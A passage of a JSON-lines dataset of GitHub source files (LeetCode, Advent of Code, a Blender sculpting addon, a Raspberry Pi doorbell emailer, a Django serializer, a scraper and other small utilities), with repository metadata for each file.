print(s.removeSubfolders(folder=[\"/a\", \"/a/b\", \"/c/d\", \"/c/d/e\", \"/c/f\"]))\n print(s.removeSubfolders(folder=[\"/a/b/c\", \"/a/b/ca\", \"/a/b/d\"]\n ))\n print(s.removeSubfolders(folder=[\"/a\", \"/a/b/c\", \"/a/b/d\"]))\n","repo_name":"ccctw-ma/leetcode","sub_path":"src/Medium/String/removeSubfolders.py","file_name":"removeSubfolders.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20074445844","text":"from copy import deepcopy\n\nfrom biotite.database.rcsb import fetch\nfrom biotite.structure import AtomArray\n\nfrom language import (\n ConstantSequenceSegment,\n MaximizePLDDT,\n MaximizePTM,\n MaximizeSurfaceExposure,\n MinimizeCRmsd,\n MinimizeDRmsd,\n MinimizeSurfaceHydrophobics,\n ProgramNode,\n VariableLengthSequenceSegment,\n get_atomarray_in_residue_range,\n pdb_file_to_atomarray,\n sequence_from_atomarray,\n)\n\n\ndef scaffolding_ace2() -> ProgramNode:\n binding_site_atoms: AtomArray = pdb_file_to_atomarray(fetch(\"6m0j\", format=\"pdb\"))\n binding_site_atoms = get_atomarray_in_residue_range(\n binding_site_atoms, start=23, end=42\n )\n binding_site_sequence: str = sequence_from_atomarray(binding_site_atoms)\n print(binding_site_sequence)\n\n leader_amino_acid_sequence = VariableLengthSequenceSegment(50)\n binding_site_sequence = ConstantSequenceSegment(binding_site_sequence)\n follower_amino_acid_sequence = VariableLengthSequenceSegment(50)\n\n return ProgramNode(\n energy_function_terms=[\n MaximizePTM(),\n MaximizePLDDT(),\n MinimizeSurfaceHydrophobics(),\n ],\n children=[\n ProgramNode(sequence_segment=leader_amino_acid_sequence),\n ProgramNode(\n sequence_segment=binding_site_sequence,\n energy_function_terms=[\n MaximizeSurfaceExposure(),\n MinimizeCRmsd(template=binding_site_atoms),\n MinimizeDRmsd(template=binding_site_atoms),\n ],\n energy_function_weights=[1.0, 10.0, 10.0],\n ),\n ProgramNode(sequence_segment=follower_amino_acid_sequence),\n ]\n )\n","repo_name":"facebookresearch/esm","sub_path":"examples/protein-programming-language/programs/functional_site_scaffolding.py","file_name":"functional_site_scaffolding.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":2471,"dataset":"github-code","pt":"3"} +{"seq_id":"36791854178","text":"import mimetypes\n\n\ndef encode_multipart_formdata(fields, files):\n \"\"\"参考urllib,拼接multipart/form-data类型的HTTP请求中body,\n 返回拼接的body内容及Content-Type\"\"\"\n boundary = \"----------ThIs_Is_tHe_bouNdaRY_$\"\n crlf = \"\\r\\n\"\n l = []\n for (key, value) in fields:\n l.append(\"--\" + boundary)\n l.append('Content-Disposition: form-data; name=\"%s\"' % key)\n l.append(\"\")\n l.append(value)\n for (key, filename, value) in files:\n\n l.append(\"--\" + boundary)\n l.append(\n 'Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"' % (key, filename)\n )\n l.append(\"Content-Type: %s\" % get_content_type(filename))\n l.append(\"\")\n l.append(value)\n l.append(\"--\" + boundary + \"--\")\n l.append(\"\")\n body = crlf.join(l)\n content_type = \"multipart/form-data; boundary=%s\" % boundary\n return content_type, body\n\n\ndef get_content_type(filename):\n return mimetypes.guess_type(filename)[0] or \"application/octet-stream\"\n\n\ndef encoded_dict(in_dict):\n if not in_dict:\n return\n out_dict = {}\n for k, v in in_dict.items():\n if isinstance(v, str):\n v = v.encode(\"utf8\")\n elif isinstance(v, bytes):\n # Must be encoded in UTF-8\n v.decode(\"utf8\")\n out_dict[k] = v\n return out_dict\n","repo_name":"khuencheng/torn-requests","sub_path":"torn_requests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29447293376","text":"from rest_framework import serializers\nfrom rest_framework.serializers import HyperlinkedIdentityField\n\nfrom django.utils.timesince import timesince\n\nfrom cocktail.models import Ingredient\n\ningredient_detail_url = HyperlinkedIdentityField(\n view_name='api-ingredients:detail',\n lookup_field='slug'\n )\n\n\nclass IngredientModelSerializer(serializers.ModelSerializer):\n url = ingredient_detail_url\n number_drinks = serializers.SerializerMethodField()\n class Meta:\n model = Ingredient\n fields = [\n 'url',\n 'name',\n 'user',\n 'slug',\n 'number_drinks'\n ]\n def get_number_drinks(self, obj):\n return obj.drink_set.all().count()\n\n\n\"\"\"\nclass WebpageURLModelSerializer(serializers.ModelSerializer):\n class Meta:\n model = WebpageURL\n fields = [\n 'webpage_url',\n ]\n\nclass AmountModelSerializer(serializers.ModelSerializer):\n ingredient = IngredientModelSerializer()\n drinks = serializers.SerializerMethodField()\n\n class Meta:\n model = Amount\n fields = [\n 'amount',\n 'ingredient',\n 'drinks',\n ]\n\n def get_drinks(self, obj):\n qs = obj.drink_set.all()\n names = []\n for drink in qs:\n names.append(drink.name)\n return names\n\n\"\"\"\n","repo_name":"nelsondude/tipsyapp","sub_path":"cocktail/api/ingredients/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6329901443","text":"from picamera import PiCamera\nfrom email.mime.text import MIMEText\nfrom email.mime.image import MIMEImage\nfrom email.mime.multipart import MIMEMultipart\nimport smtplib\nimport datetime\nimport time\nimport storeFileFB\nimport sys\nimport uuid\n\ncamera = PiCamera()\n\nchat_id = 'GET-YOUR-OWN-CHAT-ID' # This chat ID should be the same as the one within the dong-call.py file\n\nfrom_email = 'FROM-EMAIL@EXAMPLE.com'\nto_email = 'TO-EMAIL@EXAMPLE.com'\n\ndef send_mail(eFrom, to, subject, text, attachment):\n # SMTP Server details: update to your credentials or use class server\n smtpServer='GET-YOUR-OWN-SERVER'\n smtpUser='GET-YOUR-OWN-USER'\n smtpPassword='GET-YOUR-OWN-PASSWORD'\n port=587\n\n # open attachment and read in as MIME image\n fp = open(attachment, 'rb')\n msgImage = MIMEImage(fp.read())\n fp.close()\n\n #construct MIME Multipart email message\n msg = MIMEMultipart()\n msg.attach(MIMEText(text))\n msgImage['Content-Disposition'] = 'attachment; filename=\"image.jpg\"'\n msg.attach(msgImage)\n msg['Subject'] = subject\n\n # Authenticate with SMTP server and send\n s = smtplib.SMTP(smtpServer, port)\n s.login(smtpUser, smtpPassword)\n s.sendmail(eFrom, to, msg.as_string())\n s.quit()\n\ncamera.start_preview()\nframe = str(uuid.uuid4()) # Creates unique ID for the image to avoid duplicates\n\nif __name__ == '__main__':\n currentTime = datetime.datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\n fileLoc = f'YOUR-FILE-PATH-HERE/img/frame{frame}.jpg' # set location of image file\n camera.capture(fileLoc) # Camera takes a picture of anyone who rings the doorbell\n text= f'Dong! Someone rang your doorbell at {currentTime}, see who it is and talk with them at http://meet.jit.si/%s' % chat_id\n send_mail(from_email, to_email, 'Dong! Someone is at the door.', text, fileLoc) # Sends and email with the photo of the caller and a link to the meeting (in case the blynk app malfuctions\n print(f'frame {frame} taken at {currentTime}') # print frame number to console\n\n storeFileFB.store_file(fileLoc)\n storeFileFB.push_db(fileLoc, currentTime)\n","repo_name":"WergiForce/IOT-Application","sub_path":"dong-photo.py","file_name":"dong-photo.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6363943462","text":"from DBDynamics import Ant\nimport time\nimport random\n\nimport datetime\n\n# Linux系统下为/dev/ttyUSB?,如/dev/ttyUSB0,/dev/ttyUSB1\nm = Ant('/dev/ttyUSB0')\n# Windows系统下为COM?,如COM2 COM3\n# m = Ant('COM6')\n\n# 电机编号:范围1-120\nmid = 1\n\n# 设置平滑位置模式\nm.setPositionMode(id=mid)\n\n# 设置运行电流:参数推荐范围200-1200,电机运行时的电流,可根据负载大小进行调节,电流越大越不容易丢步,同时发热也越大\nm.setRunningCurrent(id=mid, value=500)\n\n# 设置保持电流:参数推荐范围200-800,电机静止时的电流,在保证不丢步的前提下尽可能减小电流降低发热量\nm.setKeepingCurrent(id=mid, value=200)\n\n# 设置使能,使能后电机由驱动器控制\nm.setPowerOn(id=mid)\n\n# 设置运行速度:参数推荐范围1-300,最大速度与供电电压和电机型号有关\n# 速度单位: pulse/10ms 近似等于RPM,1.8度步进角的4线2相电机对应50000 pulse/圈\nm.setTargetVelocity(id=mid, value=200)\n\n# 设置加速时间:单位ms,参数推荐范围100-2000\n# 对于质量较大的负载,可以通过加大加速时间来防止丢步\nm.setAccTime(id=mid, value=100)\n\n\n# 自定义函数:旋转到绝对角度(系统上电或者回零处为0)\ndef moveAngle(motor_id, theta):\n # 360度对应50000脉冲\n k = 50000 / 360.0\n pos = theta * k\n m.setTargetPosition(id=motor_id, value=int(pos))\n\n\n# 自定义函数:等待到位\ndef wait(motor_id):\n time.sleep(0.5)\n m.waitTargetPositionReached(id=motor_id)\n\n\nfor i in range(0, 10):\n moveAngle(mid, 90 * i)\n wait(mid)\n\nm.stop()\n","repo_name":"DBDynamics/PythonSDK","sub_path":"antDemo.py","file_name":"antDemo.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"zh","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"} +{"seq_id":"23595082714","text":"import os\nimport urllib\nimport userAgent\nimport time\nfrom BeautifulSoup import BeautifulSoup # For processing HTML\nfrom urllib import FancyURLopener\nimport datetime\nfrom datetime import datetime\n\nclass century21Details():\n\tdef domain(self):\n\t\treturn \"century21\"\n\n\tindexBaseURL = \"http://www.century21.ca\"\n\t\n\tdef indexURL(self,page):\n\t\treturn self.indexBaseURL+\"/CA/BC/Victoria/0-/Page\"+str(page)\t\n\n\tdef allInfoLinks(self, content):\n\t\tlinks = []\n\t\tsoup = BeautifulSoup(content)\n\t\tlinkData = soup.findAll('tr')\n\t\tfor link in linkData:\n\t\t\tif link.has_key('onclick') and \"location.href='/Property/BC/\" in link['onclick']:\n\t\t\t\tdetailsURL = link['onclick'].replace(\"location.href=\",\"\").replace(\"'\",\"\")\n\t\t\t\tlinks.append(detailsURL)\n\t\tlinks = list(set(links))\n\t\treturn links\n\n\n\tdef mlsFromPosting(self,content):\n\t\tsoup = BeautifulSoup(content)\n\t\tmlsTR = soup.find('tr', {\"id\":\"IDXRow\"})\n\n\t\tif mlsTR:\n\t\t\ttds = mlsTR.findChildren()\n\t\t\tif len(tds)==2:\n\t\t\t\tmls = str(tds[1].text)\n\t\t\t\tif mls!=\"n/a\":\n\t\t\t\t\treturn mls\n\t\treturn \"no_mls\"\n","repo_name":"joram/realestate","sub_path":"scrape/detailsCentury21.py","file_name":"detailsCentury21.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"32146108580","text":"from datetime import datetime\n\ndef timer(funk):\n def wrapper(*args, **kwargs):\n start = datetime.now()\n res = funk(*args, **kwargs)\n print(datetime.now() - start)\n return res\n return wrapper\n\n@timer\ndef solution(number):\n x = 0\n for i in range(number):\n if i %3 ==0 or i% 5==0:\n x += i\n return(x)\n\n@timer\ndef solution1(number):\n return sum(x for x in range(number) if x % 3 == 0 or x % 5 == 0)\nprint(solution1(10**7))\nprint(solution(10**7))\n","repo_name":"Kovigen/Exp","sub_path":"decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"75166671762","text":"import pygame\nimport random\nimport math\nfrom settings import ShipSettings\nfrom utilities import log_message, return_distance\nfrom bullet import Bullet\n\nclass Ship(pygame.sprite.Sprite):\n def __init__(self, earth):\n\n pygame.sprite.Sprite.__init__(self)\n\n earth.a_game.logger.update_log(\"ship created\")\n self.offset = random.uniform(0.6,1)*200\n self.orbital_angle = 0\n self.settings = ShipSettings()\n self.earth = earth\n self.hp = 100\n\n self.location = [a_i - b_i for a_i, b_i in zip(earth.rect.center, [0, self.offset])]\n print(self.location)\n self.screen = earth.screen\n self.screen_rect = earth.screen.get_rect()\n\n #self.image = pygame.image.load('images/ship.bmp')\n self.master_image = pygame.image.load('images/ship.bmp')\n self.image = self.master_image.copy()\n self.rect = self.image.get_rect()\n self.rect.center = self.location\n\n self.bullets = pygame.sprite.Group()\n\n\n def blitme(self):\n self.screen.blit(self.image, self.rect)\n\n def update_position(self):\n self.orbital_angle -= self.settings.ship_angular_speed\n self.rect.center = [a_i - b_i for a_i, b_i in zip(self.earth.rect.center, [self.offset*math.sin(self.orbital_angle), self.offset*math.cos(self.orbital_angle)])]\n self.open_fire(self.detect_nearest_hostile(300))\n self.image = pygame.transform.rotate(self.master_image, self.orbital_angle * 360 / (2 * math.pi))\n\n\n def detect_nearest_hostile(self, range):\n distance = 10000\n for enemy in self.earth.a_game.encounter.enemies:\n distance_to_enemy = return_distance(self, enemy)\n if distance_to_enemy < distance:\n distance = distance_to_enemy\n nearest_hostile = enemy\n if distance < range:\n return nearest_hostile\n else:\n return 0\n \n def open_fire(self, hostile):\n if hostile != 0:\n if len(self.bullets) < 1:\n new_bullet = Bullet(self, hostile)\n self.bullets.add(new_bullet)\n self.earth.a_game.bullets.add(new_bullet)\n hostile.targeting_bullets.add(new_bullet)\n\n def receive_damage(self, amount):\n self.hp -= amount\n if self.hp < 0:\n self.delete_ship()\n \n def delete_ship(self):\n self.kill()\n del self\n\n\n \n ","repo_name":"danny-hunt/Alienz","sub_path":"ships.py","file_name":"ships.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33036191853","text":"import requests\nfrom bs4 import BeautifulSoup\nimport json\ndef get_data(req_url):\n \"\"\"获取数据\"\"\"\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',\n 'Accept-Language': 'zh-Hans-CN, zh-Hans;q=0.5'\n }\n resp = requests.get(req_url, headers=headers)\n resp.encoding = 'utf8' \n if resp.status_code == 200:\n return resp.text\n else:\n return None\n\ndef parse_data(resp_html):\n \"\"\"解析数据,并返回列表\"\"\"\n soup = BeautifulSoup(resp_html, features='html.parser')\n # print(soup.prettify())\n focus_table = soup.find(\"div\", attrs={'id': 'focus'})\n # print(focus_table)\n focus_list = focus_table.find_all('li')\n # print(focus_list)\n res_list = []\n for focus in focus_list:\n title = focus.find('img').get('alt')\n img = focus.find('img').get('src')\n res_item = {\n '标题': title,\n '图片': img,\n }\n res_list.append(res_item)\n return res_list\n\n\ndef save_data(res_list):\n \"\"\"保存数据\"\"\"\n with open('focus.json', 'w', encoding='utf-8') as f:\n res_list_json = json.dumps(res_list, ensure_ascii=False)\n f.write(res_list_json)\n print(res_list_json)\n\n\nif __name__ == '__main__':\n req_url = 'http://www.cps.com.cn/'\n # 获取数据\n resp_html = get_data(req_url)\n # 解析数据\n res_list = parse_data(resp_html)\n #print(res_list)\n # 保存数据\n save_data(res_list)","repo_name":"xwuman/py-samples","sub_path":"cps-focus/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13143206146","text":"# Advent of code Day 10 | 2023\n# https://adventofcode.com/2023/day/10\nprint(\"Advent of code Day 10 | 2023\\n\")\nimport time\n\nwith open(\"./input/day_10.in\", \"r\") as f:\n data = [list(line.strip()) for line in f.readlines()]\n\n\n# Part 1\nstart_1 = time.time()\n\n\ndef find(item, matrix):\n for i in range(len(matrix)):\n if item not in matrix[i]:\n continue\n\n return (i, matrix[i].index(item))\n\n return None\n\n\ndef get_next(pos, matrix, last=None):\n row, col = pos\n current = matrix[row][col]\n\n top, bottom = (row - 1, col), (row + 1, col)\n left, right = (row, col - 1), (row, col + 1)\n\n if current in [\"|\", \"L\", \"J\", \"S\"] and row > 0: # TOP\n if top != last and matrix[top[0]][top[1]] != \".\":\n return top, pos\n\n if current in [\"|\", \"F\", \"7\", \"S\"] and row < len(matrix): # BOTTOM\n if bottom != last and matrix[bottom[0]][bottom[1]] != \".\":\n return bottom, pos\n\n if current in [\"-\", \"7\", \"J\", \"S\"] and col > 0: # LEFT\n if left != last and matrix[left[0]][left[1]] != \".\":\n return left, pos\n\n if current in [\"-\", \"F\", \"L\", \"S\"] and col < len(matrix[0]): # RIGHT\n if right != last and matrix[right[0]][right[1]] != \".\":\n return right, pos\n\n return None, None\n\n\nlength = 1\ncurrent, last = get_next(find(\"S\", data), data)\n\nwhile data[current[0]][current[1]] != \"S\":\n current, last = get_next(current, data, last)\n length += 1\n\nlength //= 2\nprint(f\"[PART 1] Time: {(time.time() - start_1):.4f}s Result: {length}\")\n","repo_name":"Bartek-M/Advent-Of-Code","sub_path":"2023/day_10.py","file_name":"day_10.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"16231040928","text":"'''\r\nCopyright (C) 2018 Jean Da Costa machado.\r\nJean3dimensional@gmail.com\r\n\r\nCreated by Jean Da Costa machado\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see .\r\n'''\r\n\r\nimport bpy\r\n\r\n\r\nclass FlowToolsSymmetrize(bpy.types.Operator):\r\n bl_idname = \"sculptkt.symmetrize\"\r\n bl_label = \"SculpTKt Symmetrize\"\r\n bl_description = \"\"\r\n bl_options = {\"REGISTER\", \"UNDO\"}\r\n\r\n direction = bpy.props.EnumProperty(\r\n name=\"Direction\",\r\n items=[\r\n (\"NEGATIVE_X\", \"-x to +x\", \"-x to +x\"),\r\n (\"POSITIVE_X\", \"+x to -x\", \"+x to -x\"),\r\n (\"NEGATIVE_Y\", \"-y to +y\", \"-y to +y\"),\r\n (\"POSITIVE_Y\", \"+y to -y\", \"+y to -y\"),\r\n (\"NEGATIVE_Z\", \"-z to +z\", \"-z to +z\"),\r\n (\"POSITIVE_Z\", \"+z to -z\", \"+z to -z\"),\r\n ]\r\n )\r\n\r\n @classmethod\r\n def poll(cls, context):\r\n if context.active_object:\r\n return context.active_object.mode == \"SCULPT\"\r\n\r\n def invoke(self, context, event):\r\n bpy.ops.ed.undo_push()\r\n return self.execute(context)\r\n\r\n def execute(self, context):\r\n\r\n if context.active_object.use_dynamic_topology_sculpting:\r\n context.tool_settings.sculpt.symmetrize_direction = self.direction\r\n bpy.ops.sculpt.symmetrize()\r\n\r\n else:\r\n bpy.ops.sculpt.dynamic_topology_toggle()\r\n bpy.ops.sculpt.symmetrize()\r\n\r\n return {\"FINISHED\"}\r\n\r\n\r\ndef armature_tools(pie):\r\n pie.operator(\"sculptkt.convert_envelope_to_mesh\", icon=\"MESH_DATA\")\r\n pie.operator(\"sculptkt.add_envelope_armature\", text=\"Add Envelope Bone\", icon=\"BONE_DATA\")\r\n pie.operator(\"sculptkt.load_envelope_armature\", text=\"Add Envelope Base\", icon=\"MOD_ARMATURE\")\r\n\r\n\r\ndef add_tools(pie):\r\n pie.operator(\"sculptkt.add_envelope_armature\", text=\"Add Envelope Bone\", icon=\"BONE_DATA\")\r\n pie.operator(\"sculptkt.load_envelope_armature\", text=\"Add Envelope Base\", icon=\"MOD_ARMATURE\")\r\n\r\n\r\ndef object_tools(pie):\r\n pie.menu(\"OBJECT_MT_booleans\", icon=\"MOD_BOOLEAN\")\r\n pie.menu(\"OBJECT_MT_slash\", icon=\"SCULPTMODE_HLT\")\r\n pie.operator(\"object.mode_set\", text=\"Sculpt\", icon=\"SCULPTMODE_HLT\").mode = \"SCULPT\"\r\n pie.operator(\"object.mode_set\", text=\"Edit\", icon=\"EDITMODE_HLT\").mode = \"EDIT\"\r\n pie.operator(\"sculptkt.add_envelope_armature\", text=\"Add Envelope Bone\", icon=\"BONE_DATA\")\r\n pie.operator(\"sculptkt.load_envelope_armature\", text=\"Add Envelope Base\", icon=\"MOD_ARMATURE\")\r\n pie.operator(\"sculptkt.optimized_remesh\", icon=\"MOD_REMESH\")\r\n pie.operator(\"sculptkt.decimate\", text=\"Decimate\", icon=\"MOD_DECIM\").popup = True\r\n\r\n\r\ndef sculpting_tools(pie):\r\n separation = 7\r\n\r\n row = pie.row()\r\n col = row.column()\r\n col.scale_x = 0.7\r\n sub_sculpt_brush_tools(col)\r\n sub_sculpt_dyntopo_tools(col)\r\n sub_sculpt_symmetry(col)\r\n\r\n for i in range(separation):\r\n row.separator()\r\n\r\n row = pie.row()\r\n for i in range(separation):\r\n row.separator()\r\n\r\n col = row.column()\r\n sub_sculpt_texture_tools(col)\r\n\r\n pie.operator(\"object.mode_set\", text=\"Object Mode\", icon=\"OBJECT_DATAMODE\").mode = \"OBJECT\"\r\n\r\n row = pie.row()\r\n sub_sculpt_mask_tools(row)\r\n\r\n pie.separator()\r\n pie.separator()\r\n\r\n sub_brush_symmetry(pie)\r\n\r\n sub_sculpt_texture_tiling(pie)\r\n\r\n\r\ndef edit_tools(pie):\r\n pie.operator(\"object.mode_set\", text=\"Sculpt\", icon=\"SCULPTMODE_HLT\").mode = \"SCULPT\"\r\n pie.operator(\"object.mode_set\", text=\"Object\", icon=\"OBJECT_DATA\").mode = \"OBJECT\"\r\n\r\n\r\ndef sub_sculpt_dyntopo_tools(layout):\r\n col = layout.column()\r\n box = col.box()\r\n box.label(\"Dynamic Topology\")\r\n\r\n dyntopo_on = bpy.context.active_object.use_dynamic_topology_sculpting\r\n tool_settings = bpy.context.tool_settings\r\n\r\n box.operator(\"sculpt.dynamic_topology_toggle\", text=\"Toggle Dyntopo OFF\" if dyntopo_on else \"Toggle Dyntopo ON\",\r\n icon=\"MESH_DATA\")\r\n\r\n if dyntopo_on:\r\n detail_type = tool_settings.sculpt.detail_type_method\r\n\r\n col = box.column(align=True)\r\n detail_row = col.row(align=True)\r\n\r\n if detail_type == \"BRUSH\":\r\n detail_row.prop(tool_settings.sculpt, \"detail_percent\")\r\n detail_row.operator(\"sculpt.sample_detail_size\", text=\"\", icon=\"EYEDROPPER\")\r\n\r\n elif detail_type == \"CONSTANT\":\r\n detail_row.prop(tool_settings.sculpt, \"constant_detail_resolution\")\r\n detail_row.operator(\"sculpt.sample_detail_size\", text=\"\", icon=\"EYEDROPPER\")\r\n\r\n elif detail_type == \"RELATIVE\":\r\n detail_row.prop(tool_settings.sculpt, \"detail_size\")\r\n\r\n col.prop(tool_settings.sculpt, \"detail_refine_method\", text=\"\")\r\n col.prop(tool_settings.sculpt, \"detail_type_method\", text=\"\")\r\n col.separator()\r\n col.prop(tool_settings.sculpt, \"use_smooth_shading\")\r\n col.separator()\r\n\r\n col.operator(\"sculpt.optimize\")\r\n if detail_type == \"CONSTANT\":\r\n col.operator(\"sculpt.detail_flood_fill\")\r\n\r\n\r\ndef sub_sculpt_mask_tools(layout):\r\n col = layout.column()\r\n row = col.row()\r\n row.scale_x = 0.9\r\n box = row.box()\r\n\r\n box.label(\"Sculpt Mask Extract\")\r\n box.operator(\"sculptkt.extract\", icon=\"MOD_DISPLACE\")\r\n box.operator(\"sculptkt.mask_split\", icon=\"MOD_DISPLACE\")\r\n\r\n box = row.box()\r\n box.label(\"Deform\")\r\n box.operator(\"sculptkt.mask_deform_add\", icon=\"MOD_LATTICE\")\r\n box.operator(\"sculptkt.mask_deform_remove\", icon=\"MOD_LATTICE\")\r\n\r\n box = row.box()\r\n box.label(\"decimate\")\r\n box.operator(\"sculptkt.decimate\", icon=\"MOD_DECIM\").ratio = bpy.context.scene.decimate_factor\r\n box.prop(bpy.context.scene, \"decimate_factor\")\r\n\r\n row = col.row()\r\n\r\n box = row.box()\r\n box.label(\"Remesh\")\r\n box.operator(\"sculptkt.optimized_remesh\", icon=\"MOD_REMESH\")\r\n\r\n\r\ndef sub_sculpt_brush_tools(layout):\r\n col = layout.column()\r\n box = col.box()\r\n box.label(\"Brush\")\r\n\r\n tool_settings = bpy.context.tool_settings\r\n box.template_ID_preview(tool_settings.sculpt, \"brush\", new=\"brush.add\", cols=5, rows=5)\r\n\r\n\r\ndef sub_sculpt_texture_tools(layout):\r\n col = layout.column()\r\n box = col.box()\r\n box.label(\"Brush Texture\")\r\n\r\n tool_settings = bpy.context.tool_settings\r\n box.template_ID_preview(tool_settings.sculpt.brush, \"texture\", new=\"texture.new\", cols=5, rows=5)\r\n box.prop(tool_settings.sculpt.brush.texture_slot, \"map_mode\")\r\n box.prop(tool_settings.sculpt.brush.texture_slot, \"angle\")\r\n col = box.column(align=True)\r\n col.prop(tool_settings.sculpt.brush.texture_slot, \"use_rake\")\r\n col.prop(tool_settings.sculpt.brush.texture_slot, \"use_random\")\r\n\r\n\r\ndef sub_sculpt_texture_tiling(layout):\r\n box = layout.box()\r\n box.label(\"TextureTilling\")\r\n texture = bpy.context.tool_settings.sculpt.brush.texture_slot\r\n row = box.row()\r\n col = row.column()\r\n col.prop(texture, \"offset\")\r\n col = row.column()\r\n col.prop(texture, \"scale\")\r\n\r\n\r\ndef sub_sculpt_symmetry(layout):\r\n box = layout.box()\r\n box.label(\"Dyntopo Symmetry\")\r\n tool_settings = bpy.context.tool_settings\r\n box.prop(tool_settings.sculpt, \"symmetrize_direction\")\r\n box.operator(\"sculpt.symmetrize\")\r\n\r\n\r\nclass FlowTools2(bpy.types.Menu):\r\n bl_idname = \"OBJECT_MT_flow_tools\"\r\n bl_label = \"SculpTKt\"\r\n\r\n def draw(self, context):\r\n layout = self.layout\r\n pie = layout.menu_pie()\r\n\r\n if not context.active_object:\r\n add_tools(pie)\r\n return\r\n\r\n ob_type = context.active_object.type\r\n object_mode = context.active_object.mode == \"OBJECT\"\r\n sculpt_mode = context.active_object.mode == \"SCULPT\"\r\n edit_mode = context.active_object.mode == \"EDIT\"\r\n\r\n if object_mode:\r\n if ob_type != \"ARMATURE\":\r\n object_tools(pie)\r\n\r\n else:\r\n armature_tools(pie)\r\n\r\n elif sculpt_mode:\r\n sculpting_tools(pie)\r\n\r\n elif edit_mode:\r\n edit_tools(pie)\r\n\r\n\r\ndef sub_brush_symmetry(layout):\r\n box = layout.box()\r\n box.label(\"Brush Symmetry\")\r\n tool_settings = bpy.context.tool_settings.sculpt\r\n box.prop(tool_settings, \"use_symmetry_x\")\r\n box.prop(tool_settings, \"use_symmetry_y\")\r\n box.prop(tool_settings, \"use_symmetry_z\")\r\n\r\n\r\nclass Booleans(bpy.types.Menu):\r\n bl_idname = \"OBJECT_MT_booleans\"\r\n bl_label = \"Boolean Operations\"\r\n\r\n def draw(self, context):\r\n layout = self.layout\r\n layout.operator(\"sculptkt.multi_object_boolean\", text=\"Add\", icon=\"MOD_ARRAY\").operation = \"UNION\"\r\n layout.operator(\"sculptkt.multi_object_boolean\", text=\"Sub\", icon=\"MOD_BOOLEAN\").operation = \"DIFFERENCE\"\r\n layout.operator(\"sculptkt.multi_object_boolean\", text=\"Intersect\", icon=\"MOD_MULTIRES\").operation = \"INTERSECT\"\r\n\r\n\r\nclass Slash(bpy.types.Menu):\r\n bl_idname = \"OBJECT_MT_slash\"\r\n bl_label = \"Slash Stroke\"\r\n\r\n def draw(self, context):\r\n layout = self.layout\r\n\r\n slash_operator = layout.operator(\r\n \"sculptkt.slash_bool\", text=\"Draw Slash\", icon=\"SCULPTMODE_HLT\")\r\n\r\n slash_operator.cut_thickness = bpy.context.scene.slash_cut_thickness\r\n slash_operator.boolean_solver = bpy.context.scene.slash_boolean_solver\r\n slash_operator.cut_using_mesh = False\r\n slash_operator.is_ciclic = bpy.context.scene.use_slash_ciclic\r\n slash_operator.delete_small_pieces = bpy.context.scene.delete_slash_smallest_pieces\r\n\r\n slash_operator = layout.operator(\r\n \"sculptkt.slash_bool\", text=\"Mesh Cutter Slash\", icon=\"MESH_DATA\")\r\n\r\n slash_operator.cut_thickness = bpy.context.scene.slash_cut_thickness\r\n slash_operator.boolean_solver = bpy.context.scene.slash_boolean_solver\r\n slash_operator.cut_using_mesh = True\r\n slash_operator.is_ciclic = bpy.context.scene.use_slash_ciclic\r\n\r\n layout.menu(\"VIEW3D_MT_slash_options\", icon=\"MODIFIER\")\r\n\r\n\r\nclass SlashOptions(bpy.types.Menu):\r\n bl_idname = \"VIEW3D_MT_slash_options\"\r\n bl_label = \"Slash Options\"\r\n\r\n def draw(self, context):\r\n layout = self.layout\r\n layout.prop(bpy.context.scene, \"slash_cut_thickness\")\r\n layout.prop(bpy.context.scene, \"use_slash_ciclic\")\r\n layout.prop(bpy.context.scene, \"delete_slash_smallest_pieces\")\r\n layout.prop(bpy.context.scene, \"slash_boolean_solver\", text=\"\")\r\n","repo_name":"jeacom25b/Sculpt-tkt","sub_path":"ui_menus.py","file_name":"ui_menus.py","file_ext":"py","file_size_in_byte":10965,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"3"} +{"seq_id":"37013989076","text":"def area(l, c):\n area = l * c\n print(f'A área de um terreno {l}x{c} é de {area}m²')\n\n\n#Programa Princial\nprint('CONTROLE DE TERRENOS')\nprint('-' * 30)\nl = float(input('LARGURA (m):'))\nc = float(input('COMPRIMENTO (m):'))\narea(l, 